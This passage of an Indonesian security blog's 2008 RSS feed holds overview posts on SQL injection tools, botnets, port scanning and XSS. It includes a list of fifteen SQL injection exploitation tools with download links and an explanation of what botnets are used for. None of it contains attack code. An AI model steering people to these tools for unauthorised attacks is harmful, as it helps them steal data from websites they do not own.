class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/ajax-what-is.html" rel="bookmark">AJAX, What is?</a></h3><p>Ajax, shorthand for "Asynchronous JavaScript and XML", is a web development technique for creating interactive web applications. The intent is to make web pages feel ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=83&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/about-sqlninja.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL Injection Scanner</title>
		<link>http://budi.akmi-baturaja.ac.id/sql-injection-scanner.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/sql-injection-scanner.html#comments</comments>
		<pubDate>Wed, 09 Jul 2008 05:56:04 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>
		<category><![CDATA[SQL injection scanner]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=155</guid>
		<description><![CDATA[Berikut ini beberapa aplikasi (tepatnya 15 aplikasi) yang dapat anda gunakan untuk melakukan scanning terhadap SQL Injection pada server yang paling banyak digunakan saat ini. Dengan sifatnya yang free alias gratis makin membuat aplikasi ini menjadi makin populer dan paling banyak digunakan hingga saat ini! Asik to&#8230; SQLIer &#8211; SQLIer takes a vulnerable URL and [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Berikut ini beberapa aplikasi (tepatnya 15 aplikasi) yang dapat anda gunakan untuk melakukan scanning terhadap SQL Injection pada server yang paling banyak digunakan saat ini. Dengan sifatnya yang free alias gratis makin membuat aplikasi ini menjadi makin populer dan paling banyak digunakan hingga saat ini! Asik to&#8230; </p>
<p><span id="more-80"></span></p>
<ul>
<li> SQLIer &#8211; SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. <a href="http://bcable.net/project.php?sqlier" target="_blank">Download SQLIer</a></li>
<li>SQLbftools &#8211; SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. <a href="http://www.reversing.org/node/view/11" target="_blank">Download SQLbftools</a></li>
<li>SQL Injection Brute-forcer &#8211; SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. <a href="http://www.open-labs.org/sqlibf19beta1.tar.gz" target="_blank">Download SQLLibf</a></li>
<li>SQLBrute &#8211; SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. <a href="http://www.justinclarke.com/security/sqlbrute.py" target="_blank">Download SQLBrute</a></li>
<li>BobCat &#8211; BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. <a href="http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html" target="_blank">Download BobCat</a></li>
<li>SQLMap &#8211; SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. <a href="http://sqlmap.sourceforge.net/" target="_blank">Download SQLMap</a></li>
<li>Absinthe &#8211; Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. <span class="style1"><a href="http://www.0x90.org/releases/absinthe/download.php" target="_blank">Download Absinthe</a></span></li>
<li>SQL Injection Pen-testing Tool &#8211; The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. <a href="http://sqltool.itdefence.ru/indexeng.html" target="_blank">Download SQL Injection Pen-testing tool</a></li>
<li>SQID &#8211; SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. <a href="http://sqid.rubyforge.org/" target="_blank">Download SQID</a></li>
<li>Blind SQL Injection Perl Tool &#8211; bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. <a href="http://www.unsec.net/download/bsqlbf.pl" target="_blank">Download Blind SQL Injection Perl Tool</a></li>
<li>SQL Power Injection Injector &#8211; SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. <a href="http://www.sqlpowerinjector.com/" target="_blank">Download SQL Power Injection</a></li>
<li>FJ-Injector Framwork &#8211; FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. <a href="http://sourceforge.net/project/showfiles.php?group_id=183841" target="_blank">Download FJ-Injector Framework</a></li>
<li>SQLNinja &#8211; SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. <a href="http://sqlninja.sourceforge.net/" target="_blank">Download SQLNinja</a></li>
<li>Automagic SQL Injector &#8211; The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. <a href="http://www.indianz.ch/tools/attack/automagic.zip" target="_blank">Download Automagic SQL Injector</a></li>
<li>NGSS SQL Injector &#8211; NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. <a href="http://www.indianz.ch/tools/attack/sqlinjector.zip" target="_blank">Download NGSS SQL Injector</a></li>
</ul>
<p>Sumber : www.security-hacks.com</p>
<div id="seo_alrp_related"><h2>Posts Related to SQL Injection Scanner</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/sql-injection.html" rel="bookmark">SQL injection</a></h3><p>SQL injection is a security exploit in which the attacker adds SQL code to a Web form input box to gain access. Manual testing for ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/about-sqlninja.html" rel="bookmark">About SQLninja</a></h3><p>Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/tentang-xss.html" rel="bookmark">Tentang XSS</a></h3><p>Cross-Site Scripting adalah sebuah injeksi yang dapat di input ke html atau me-remote halaman sebuah webpage. Cross-Site scripting atau biasa disingkat "XSS" adalah salah satu ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/backtrack-distro-pecinta-dunia-security.html" rel="bookmark">Backtrack distro pecinta dunia security</a></h3><p>Backtrack…distro yang sangat populer dikalangan pecinta dunia security, distro ini juga termasuk favorite dikalangan underground untuk digunakan dalam berbagai kesempatan. Pertanyaannya, kenapa? apa keistimewaannya? Saat ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=80&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/sql-injection-scanner.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Botnet</title>
		<link>http://budi.akmi-baturaja.ac.id/botnet-2.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/botnet-2.html#comments</comments>
		<pubDate>Tue, 27 May 2008 09:06:21 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=126</guid>
		<description><![CDATA[Botnet dapat diasosiasikan sebagai sebuah zombie atau mayat hidup yang dapat diperintah untuk melakukan kegiatan yang kita inginkan. Maksudnya disini adalah sebuah komputer yang terinfeksi oleh trojan atau jenis virus lain yang membuat sebuah komputer tidak berjalan sebagaimana mestinya karena menjalankan perintah-perintah dari si pembuat botnet tersebut. Botnet tidak lebih dari sebuah tool yang digunakan [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Botnet dapat diasosiasikan sebagai sebuah zombie atau mayat hidup yang dapat diperintah untuk melakukan kegiatan yang kita inginkan. Maksudnya disini adalah sebuah komputer yang terinfeksi oleh trojan atau jenis virus lain yang membuat sebuah komputer tidak berjalan sebagaimana mestinya karena menjalankan perintah-perintah dari si pembuat botnet tersebut. Botnet tidak lebih dari sebuah tool yang digunakan untuk banyak motif yang diinginkan oleh si pembuat botnet. Kebanyakan botnet digunakan untuk kegiatan kriminal (aktifitas mendatangkan uang) atau untuk menghancurkan. Beberapa contoh penggunaan botnet adalah sebagai berikut :</p>
<p><span id="more-71"></span></p>
<p align="justify"><strong>Distributed Denial-of-Service</strong><br />
Kadang komputer yang telah menjadi sebuah botnet digunakan untuk sebuah serangan Distributed Denial-of-Service (DDoS). Serangan DDoS adalah serangan pada sebuah system komputer atau jaringan yang menyebabkan hilangnya service pada user yang biasanya berupa hilangnya koneksi dari jaringan dan service dengan menghabiskan bandwidth jaringan korban atau overloading-nya sumberdaya (resource) sistem si korban. Botnet kebanyakan digunakan dalam skala besar dalam sebuah serangan. Bayangkan saja jika jumlahnya ribuan komputer bot yang menyerang system anda. Tiap bot akan membawa sebuah serangan DDoS melawan host yang lain. Kebanyakan juga menggunakan TCP SYN dan UDP flood attack untuk membanjiri sebuah host target.<br />
Ada juga yang menggunakan botnet untuk menjalankan commercial DDoS attack pada lawan atau target yang dituju. Ada juga yang menggunakan botnet untuk mengirim bulk mail yang juga membawa serangan DDoS untuk melawan sebuah web server tertentu.<br />
Sebagai catatan bahwa serangan DDoS attacks tidak dibatasi pada web server saja, secara logika bahwa semua service yang tersedia dalam Internet dapat menjadi target sebuah serangan. Higher-level protocol dapat digunakan untuk menambah pay load, bahkan serangan akan lebih efektif seperti dengan menjalankan exhausting search queries dalam bulletin board atau recursive HTTP-flood dalam website korban.<br />
Recursive HTTP-flood berarti bot akan mulai dari sebuah link HTTP dan akan diikuti dengan seluruh link yang ada pada website korban. Cara ini biasa juga disebut dengan spidering.</p>
<p align="justify"><strong> Spamming</strong><br />
Beberapa bot menawarkan banyak kemungkinan untuk membuka proky SOCKS v4/v5 yaitu sebuah protocol proxy untuk TCP/IP. Setelah mengaktifkan proxy SOCKS, kemudian akan digunakan untuk menjalankan berbagai keperluan seperti spamming. Dengan bantuan sebuah botnet dan jutaan bot tersebut, seorang penyerang akan dapat mengirimkan bulk email (spam) secara besar-besaran. Beberapa bot juga mengimplementasikan sebuah fungsi spesial untuk mengambil alamat email. Kadang email spam yang anda terima you dikirim dari alamat email teman anda atau bias juga menggunakan proxy teman anda yang telah terinfeksi.</p>
<p align="justify"><strong> Sniffing Traffic</strong><br />
Bot juga dapat menggunakan sebuah paket sniffer untuk melihat text data menarik yang lewat dalam sebuah komputer. Biasanya informasi yang berguna yang akan diambil dalam sebuah komputer yang telah terinfeksi seperti username dan password.<br />
Dan masih banyak lagi kegunaan dari botnet yang dapat digunakan seperti : Keylogging, menyebarkan malware, menyerang jaringan chat IRC, Manipulasi poling atau game online, pencurian identitas secara besar besaran dan lain sebagainya.</p>
<p>Beberapa jenis botnet adalah :</p>
<ol></ol>
<ul>
<li> Agobot/Phatbot/Forbot/XtremBot</li>
<li> SDBot/RBot/UrBot/UrXBot/&#8230;</li>
<li> mIRC-based Bots &#8211; GT-Bots</li>
<li> DSNX Bots</li>
<li> Q8 Bots</li>
<li> Kaiten</li>
<li> Perl-based bots</li>
<li> dan masih banyak lagi yang lain</li>
</ul>
<ol></ol>
<div id="seo_alrp_related"><h2>Posts Related to Botnet</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/botnet.html" rel="bookmark">Botnet</a></h3><p>Botnet dapat diasosiasikan sebagai sebuah zombie atau mayat hidup yang dapat diperintah untuk melakukan kegiatan yang kita inginkan. Maksudnya disini adalah sebuah komputer yang terinfeksi ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/proxy-%e2%80%93-untuk-sharing-internet.html" rel="bookmark">Proxy – Untuk Sharing Internet</a></h3><p>Onno W. Purbo Teknik proxy adalah teknik yang standar untuk akses Internet secara bersama-sama oleh beberapa komputer sekaligus dalam sebuah Local Area Network (LAN) melalui ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/sniffing-jaringan-dengan-ethereal.html" rel="bookmark">Sniffing Jaringan dengan Ethereal</a></h3><p>Sniffing, alias mengendus. Untuk istilah bidang informatika, sniffing adalah pekerjaan menyadap paket data yang lalu-lalang di sebuah jaringan. Paket data ini bisa berisi informasi mengenai ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/15-jenis-serangan-cracker.html" rel="bookmark">Serangan Cracker</a></h3><p>Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=71&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/botnet-2.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking Tool</title>
		<link>http://budi.akmi-baturaja.ac.id/hacking-tool.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/hacking-tool.html#comments</comments>
		<pubDate>Wed, 21 May 2008 13:16:24 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=122</guid>
		<description><![CDATA[Posts Related to Hacking ToolSQL injectionSQL injection is a security exploit in which the attacker adds SQL code to a Web form input box to gain access. Manual testing for ...&#8216;Samurai Cyber&#8217; Latih Jawara IT IndonesiaPara jawara keamanan cyber Indonesia mendapat tamu khusus beberapa waktu lalu, yakni kedatangan tamu ahli kemanan TI asal Jepang. Sang [...]]]></description>
			<content:encoded><![CDATA[Posts Related to Hacking ToolSQL injectionSQL injection is a security exploit in which the attacker adds SQL code to a Web form input box to gain access. Manual testing for ...&#8216;Samurai Cyber&#8217; Latih Jawara IT IndonesiaPara jawara keamanan cyber Indonesia mendapat tamu khusus beberapa waktu lalu, yakni kedatangan tamu ahli kemanan TI asal Jepang. Sang [...]]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/hacking-tool.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Port Scanning</title>
		<link>http://budi.akmi-baturaja.ac.id/port-scanning.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/port-scanning.html#comments</comments>
		<pubDate>Wed, 21 May 2008 05:52:43 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=120</guid>
		<description><![CDATA[Do you know what is port scanning? It is similar to a thief going through your neighborhood and checking every door and window on each house to see which ones are open and which ones are locked. TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are two of the protocols that make up the [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Do you know what is port scanning? It is similar to a thief going through your neighborhood and checking every door and window on each house to see which ones are open and which ones are locked. TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are two of the protocols that make up the TCP/IP protocol suite which is used universally to communicate on the Internet. Each of these has ports 0 through 65535 available so essentially there are more than 65,000 doors to lock. The first 1024 TCP ports are called the Well-Known Ports and are associated with standard services such as FTP, HTTP, SMTP or DNS. Some of the addresses over 1023 also have commonly associated services, but the majority of these ports are not associated with any service and are available for a program or application to use to communicate on.<span id="more-66"></span></p>
<p align="justify">Port scanning software, in its most basic state, simply sends out a request to connect to the target computer on each port sequentially and makes a note of which ports responded or seem open to more in-depth probing. If the port scan is being done with malicious intent, the intruder would generally prefer to go undetected. Network security applications can be configured to alert administrators if they detect connection requests across a broad range of ports from a single host. To get around this the intruder can do the port scan in strobe or stealth mode. Strobing limits the ports to a smaller target set rather than blanket scanning all 65536 ports. Stealth scanning uses techniques such as slowing the scan. By scanning the ports over a much longer period of time you reduce the chance that the target will trigger an alert.</p>
<p>By setting different TCP flags or sending different types of TCP packets the port scan can generate different results or locate open ports in different ways. A SYN scan will tell the port scanner which ports are listening and which are not depending on the type of response generated. A FIN scan will generate a response from closed ports- but ports that are open and listening will not send a response, so the port scanner will be able to determine which ports are open and which are not.</p>
<p>There are a number of different methods to perform the actual port scans as well as tricks to hide the true source of port scan. You can read more about some of these by visiting these web sites: Port Scanning or Network Probes Explained.</p>
<p>It is possible to monitor your network for port scans. The trick, as with most things in information security, is to find the right balance between network performance and network safety. You could monitor for SYN scans by logging any attempt to send a SYN packet to a port that isn&#8217;t open or listening. However, rather than being alerted every time a single attempt occurs- and possibly being awakened in the middle of the night for an otherwise innocent mistake- you should decide on thresholds to trigger the alert. For instance you might say that if there are more than 10 SYN packet attempts to non-listening ports in a given minute that an alert should be triggered. You could design filters and traps to detect a variety of port scan methods- watching for a spike in FIN packets or just an anomylous number of connection attempts to a variety of ports and / or IP addresses from a single IP source.</p>
<p>To help ensure that your network is protected and secure you may wish to perform your own port scans. A MAJOR caveat here is to ensure you have the approval of all the powers that be before embarking on this project lest you find yourself on the wrong side of the law. To get accurate results it may be best to perform the port scan from a remote location using non-company equipment and a different ISP. Using software such as NMap you can scan a range of IP addresses and ports and find out what an attacker would see if they were to port scan your network. NMap in particular allows you to control almost every aspect of the scan and perform various types of port scans to fit your needs.</p>
<p>Once you find out what ports respond as being open by port scanning your own network you can begin to work on determining whether its actually necessary for those ports to be accessible from outside your network. If they&#8217;re not necessary you should shut them down or block them. If they are necessary, you can begin to research what sorts of vulnerabilities and exploits your network is open to by having these ports accessible and work to apply the appropriate patches or mitigation to protect your network as much as possible.</p>
<p>Freeware Port Scanners :</p>
<ul>
<li>NMap</li>
<li>Foundstone Vision</li>
<li>Portscan 2000</li>
</ul>
<p>Sumber : http://netsecurity.about.com</p>
<div id="seo_alrp_related"><h2>Posts Related to Port Scanning</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/about-sqlninja.html" rel="bookmark">About SQLninja</a></h3><p>Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/setting-wireless.html" rel="bookmark">Setting Wireless</a></h3><p>Home networks are efficient and convenient, but the mess of wires and cables involved can hold you captive to a few locations in your home. ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/sql-injection.html" rel="bookmark">SQL injection</a></h3><p>SQL injection is a security exploit in which the attacker adds SQL code to a Web form input box to gain access. Manual testing for ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/hacking-access-point.html" rel="bookmark">Hacking Access Point</a></h3><p>Catatan : Gak semua WiFi bisa dipake buat crack... cuma chipsetnya yg pake atheros, PRism2, &amp; 1 lagi gw lupa (sumber ada di madwifi.org klo ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=66&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/port-scanning.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Tentang XSS</title>
		<link>http://budi.akmi-baturaja.ac.id/tentang-xss.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/tentang-xss.html#comments</comments>
		<pubDate>Wed, 21 May 2008 00:38:34 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=117</guid>
		<description><![CDATA[Cross-Site Scripting adalah sebuah injeksi yang dapat di input ke html atau me-remote halaman sebuah webpage. Cross-Site scripting atau biasa disingkat &#8220;XSS&#8221; adalah salah satu teknik yang dipakai oleh XNUXER (Dani Firmansyah) dalam melakukan hack terhadap situs KPU yang sempat menghebohkan. Perbedaan XSS dan Script-Injection : 1. Script injection ialah suatu remote injeksi script untuk [...]]]></description>
			<content:encoded><![CDATA[<p>Cross-Site Scripting adalah sebuah injeksi yang dapat di input ke html atau me-remote halaman sebuah webpage. Cross-Site scripting atau biasa disingkat &#8220;XSS&#8221; adalah salah satu teknik yang dipakai oleh XNUXER (Dani Firmansyah) dalam melakukan hack terhadap situs KPU yang sempat menghebohkan.</p>
<p>Perbedaan XSS dan Script-Injection :<br />
1. Script injection ialah suatu remote injeksi script untuk memodifikasi sebuah website.<br />
2. Cross-Site Scripting tidak permanen melainkan temporary.</p>
<p>Type script yang dapat menginjeksi ke remote website/server antara lain adalah :<br />
1. HTML<br />
2. JavaScript<br />
3. VBScript<br />
4. ActiveX<br />
5. Flash</p>
<div id="seo_alrp_related"><h2>Posts Related to Tentang XSS</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/about-sqlninja.html" rel="bookmark">About SQLninja</a></h3><p>Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/membuat-mesin-pencari.html" rel="bookmark">Membuat Mesin Pencari</a></h3><p>Pernah seorang mahasiswa bertanya pada saya tentang cara membuat Mesin Pencari (Search Engine) seperti yang anda lihat di atas (header) blog ini. Jawabnya adalah dengan ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/ajax-what-is.html" rel="bookmark">AJAX, What is?</a></h3><p>Ajax, shorthand for "Asynchronous JavaScript and XML", is a web development technique for creating interactive web applications. The intent is to make web pages feel ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/merubah-font-dengan-facelift.html" rel="bookmark">Mengubah Font dengan Facelift</a></h3><p>Bagi sebagian webdesigner mungkin sudah tidak asing lagi dengan sIFR (Scalable Inman Flash Replacement) yaitu sebuah tool berbasis javascript yang dapat merubah teks ke dalam ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=64&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/tentang-xss.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

